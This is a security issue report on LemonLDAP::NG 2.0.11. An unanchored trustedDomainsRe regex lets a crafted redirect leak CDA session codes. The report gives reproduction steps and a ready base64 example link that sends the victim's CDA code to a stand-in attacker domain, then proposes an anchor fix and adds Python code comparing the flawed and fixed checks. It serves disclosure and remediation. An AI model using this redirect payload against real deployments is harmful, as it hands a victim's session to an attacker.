[security:low] Incorrect regexp construction in isTrustedUrl lets attacker steal session on CDA application
Concerned version
Version: 2.0.11
Summary
- Configure a CDA vhost (cda.example.com)
- let attack_url = base64(http://your-untrusted-domain.com/?attack=http://cda.example.com)
- Trick your target into opening http://auth.lemontest.lxd/?url=attack_url
- The user is redirected to http://your-untrusted-domain.com/?attack=http://cda.example.com&lemonldapcda=CDA_CODE
- You may now log in to http://cda.example.com?lemonldapcda=CDA_CODE as the target user
Example: http://auth.example.com/?url=aHR0cDovL3BlcmR1LmNvbS8/ZmFrZT1odHRwOi8vY2RhLmV4YW1wbGUuY29tLw==
Possible fixes
trustedDomainsRe is missing a leading ^ anchor; this is also the case in !185 (merged).
Without the anchor, a URL that merely contains a trusted domain somewhere in it (here, inside a query-string parameter) matches, so trustedDomainsRe is easily bypassed. CDA is the feature where this mistake has the worst impact, since the CDA code returned to the untrusted site grants a session as the target user.
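As an added example (not LemonLDAP::NG code), the following reproduces the missing-anchor defect against a constructed vhost list and shows the anchored form beside it; it also goes beyond the report by adding a host-boundary lookahead and a parser-based check, so that look-alike hosts such as cda.example.com.evil.example are rejected as well. The pattern shape and the domain list are assumptions made for this example.

```python
import re
from urllib.parse import urlparse

# Constructed vhost list for illustration (not LemonLDAP::NG configuration).
TRUSTED_DOMAINS = ["cda.example.com", "app.example.com"]


def build_trusted_re(domains, anchored):
    """Build a trustedDomainsRe-style pattern from a list of vhost names.

    The shape (scheme, then an alternation of escaped host names, then a
    host-boundary lookahead) is an assumption made for this example; the
    report's defect is reproduced by dropping the leading ^.
    """
    alternation = "|".join(re.escape(d) for d in domains)
    body = r"https?://(?:" + alternation + r")(?=[/:?#]|$)"
    return re.compile(("^" if anchored else "") + body, re.IGNORECASE)


def is_trusted_url(url, anchored=True):
    """Regex check in the style the report describes: an unanchored pattern
    matches a trusted host anywhere in the string, so a query-string value
    containing http://cda.example.com is enough to pass."""
    return build_trusted_re(TRUSTED_DOMAINS, anchored).search(url) is not None


def is_trusted_host(url):
    """Parser-based alternative: compare the actual host component of the
    redirect target instead of pattern-matching the whole URL."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    return parsed.scheme in ("http", "https") and host in TRUSTED_DOMAINS


def check(url):
    """Return the verdict of each variant for one candidate redirect URL."""
    return {
        "unanchored": is_trusted_url(url, anchored=False),
        "anchored": is_trusted_url(url, anchored=True),
        "parsed": is_trusted_host(url),
    }


if __name__ == "__main__":
    # Constructed inputs: a legitimate target, the report's bypass URL, and
    # two look-alikes that an anchored but boundary-less pattern would accept.
    for url in [
        "http://cda.example.com/",
        "http://your-untrusted-domain.com/?attack=http://cda.example.com",
        "http://cda.example.com.evil.example/",
        "http://cda.example.com@evil.example/",
    ]:
        print(url, check(url))
```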